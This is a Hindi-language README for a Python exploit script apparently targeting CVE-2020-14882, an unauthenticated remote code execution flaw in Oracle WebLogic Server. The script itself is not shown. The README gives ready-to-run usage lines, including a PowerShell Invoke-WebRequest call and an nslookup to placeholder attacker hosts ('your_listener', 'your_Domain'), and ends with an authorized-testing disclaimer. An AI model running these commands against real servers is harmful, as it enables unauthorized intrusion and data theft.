
यह स्क्रिप्ट Oracle WebLogic Server पर रिमोट कोड निष्पादन (RCE) की अनुमति देती है।
यह स्क्रिप्ट Oracle WebLogic Server पर एक अप्रमाणित GET अनुरोध का उपयोग करके रिमोट कोड निष्पादन (RCE) सक्षम बनाती है। यह CVE-2020-14882 भेद्यता का शोषण करती है। मनमाने कमांड निष्पादित करके, एक हमलावर सर्वर तक अनधिकृत पहुंच प्राप्त कर सकता है।
सुनिश्चित करें कि आपके पास Python 3 स्थापित है। इस स्क्रिप्ट का उपयोग करने के लिए, नीचे दिए गए चरणों का पालन करें:
एक टर्मिनल या कमांड प्रॉम्प्ट खोलें।
निम्न कमांड का उपयोग करके स्क्रिप्ट चलाएँ:
python3 exploit.py http(s)://target:7001 command
http(s)://target:7001 को Oracle WebLogic Server के लक्षित URL से बदलें, और command को निष्पादित करने के लिए वांछित कमांड से बदलें।
उदाहरण 1:
python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
यह उदाहरण लक्षित सर्वर पर nslookup your_Domain कमांड निष्पादित करता है।
उदाहरण 2:
python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
यह उदाहरण लक्षित सर्वर पर PowerShell कमांड Invoke-WebRequest -Uri http://your_listener निष्पादित करता है।
यह स्क्रिप्ट केवल अधिकृत पेनिट्रेशन परीक्षण और सुरक्षा अनुसंधान उद्देश्यों के लिए है। उचित सहमति के बिना सिस्टम का शोषण करने के लिए इस स्क्रिप्ट का अनधिकृत उपयोग अवैध है और इसके कानूनी परिणाम हो सकते हैं। इसे अपने जोखिम पर उपयोग करें।
इस स्क्रिप्ट को निम्नलिखित निर्भरताओं की आवश्यकता है:
requestsurllib3कृपया सुनिश्चित करें कि स्क्रिप्ट चलाने से पहले ये निर्भरताएँ स्थापित हैं।